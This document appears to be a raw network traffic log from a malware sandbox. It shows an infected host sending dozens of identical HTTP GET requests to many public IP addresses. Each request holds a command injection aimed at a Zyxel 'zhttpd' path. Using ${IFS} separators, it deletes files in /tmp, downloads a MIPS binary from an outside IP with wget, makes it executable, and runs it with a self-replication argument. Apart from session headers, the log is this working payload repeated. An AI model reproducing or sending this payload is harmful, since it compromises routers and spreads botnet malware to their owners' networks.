                                    Jan 13, 2024 19:02:46.463454008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7511192.168.2.13586729.97.252.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463464022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7512192.168.2.135172036.92.177.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463531017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7513192.168.2.1333702131.222.24.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463550091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7514192.168.2.1346208156.54.108.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463583946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7515192.168.2.133543647.235.64.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463615894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7516192.168.2.133876850.47.212.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463649988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7517192.168.2.135089413.106.83.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463684082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7518192.168.2.1340230163.238.185.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463764906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7519192.168.2.1345244148.152.226.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463823080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7520192.168.2.134046842.187.169.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463840008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7521192.168.2.135254888.59.244.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463910103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7522192.168.2.1341122105.205.242.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.463949919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7523192.168.2.134217269.20.55.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464005947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7524192.168.2.133362667.188.36.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464045048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7525192.168.2.134864054.21.79.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464112043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7526192.168.2.133669866.96.216.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464158058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7527192.168.2.135530696.18.31.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464204073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7528192.168.2.1335798168.47.253.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464242935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7529192.168.2.1348474113.203.241.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464309931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7530192.168.2.1355122135.217.180.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464349031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7531192.168.2.1356354180.29.211.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464375019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7532192.168.2.133800849.82.0.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464432001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7533192.168.2.1336324141.161.207.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464497089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7534192.168.2.135225445.241.246.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464554071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7535192.168.2.1344170142.223.218.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464612007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7536192.168.2.1348146160.17.2.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464664936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7537192.168.2.133969812.51.123.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464729071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7538192.168.2.135188895.84.38.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464766979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7539192.168.2.1356856174.103.219.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464824915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7540192.168.2.1360518171.2.22.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464853048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7541192.168.2.135124470.109.23.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464947939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7542192.168.2.1344098147.124.82.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.464994907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7543192.168.2.1347914156.12.183.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465023041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7544192.168.2.1339900200.60.20.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465039015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7545192.168.2.1356694218.169.218.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465095997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7546192.168.2.1343390192.87.253.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465137005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7547192.168.2.1353432210.200.75.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465187073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7548192.168.2.1353234156.43.35.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465245962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7549192.168.2.1332830110.173.91.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465269089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7550192.168.2.1339824137.174.5.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465302944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7551192.168.2.1341380205.240.34.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465322971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7552192.168.2.1341984132.50.211.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465354919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7553192.168.2.134508086.84.85.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465430975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7554192.168.2.1353712210.10.39.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465495110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7555192.168.2.1347736131.74.8.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465523005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7556192.168.2.135105427.24.196.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465568066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7557192.168.2.1349940100.38.171.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465605974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7558192.168.2.133416844.66.116.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465629101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7559192.168.2.1335164162.134.132.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465670109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7560192.168.2.1345194103.148.23.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465717077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7561192.168.2.134433020.208.153.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465770960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7562192.168.2.1339168192.11.66.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465804100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7563192.168.2.133743224.182.135.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465845108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7564192.168.2.1340744110.97.252.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465893030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7565192.168.2.1355420203.52.248.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465938091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7566192.168.2.134450260.0.107.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465961933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7567192.168.2.1333264109.24.41.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.465981960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7568192.168.2.1359356165.183.210.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466026068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7569192.168.2.1342452154.204.47.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466053963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7570192.168.2.1355986176.131.253.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466114044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7571192.168.2.1353426196.67.28.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466134071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7572192.168.2.135819063.22.210.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466154099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7573192.168.2.1345012105.85.87.10443
                                    TimestampBytes transferredDirectionData
